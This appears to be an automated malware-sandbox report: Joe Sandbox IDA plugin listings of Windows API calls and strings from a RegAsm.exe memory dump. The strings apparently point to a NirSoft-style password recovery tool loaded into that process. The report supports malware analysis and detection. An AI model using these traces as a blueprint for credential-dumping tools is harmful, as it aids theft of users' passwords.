                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                • String ID: ---
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                • free.MSVCRT ref: 004186C7
                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                • free.MSVCRT ref: 004186E0
                                                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                • free.MSVCRT ref: 00418716
                                                                                                                                                                                • free.MSVCRT ref: 0041872A
                                                                                                                                                                                • free.MSVCRT ref: 00418749
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                • String ID: |A
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                • String ID: A
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                • String ID: caption
                                                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                • String ID: \systemroot
                                                                                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                • API String ID: 4139908857-2887671607
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                • memset.MSVCRT ref: 00410892
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?), ref: 004108A4
                                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,?,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 810783-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                • String ID: 4$h
                                                                                                                                                                                • API String ID: 4019544885-1856150674
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memchrmemset
                                                                                                                                                                                • String ID: PD$PD
                                                                                                                                                                                • API String ID: 1581201632-2312785699
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2163313125-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3592753638-3916222277
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                                                                                Strings
                                                                                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                • String ID: ($d
                                                                                                                                                                                • API String ID: 1140211610-1915259565
                                                                                                                                                                                APIs
                                                                                                                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3015003838-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
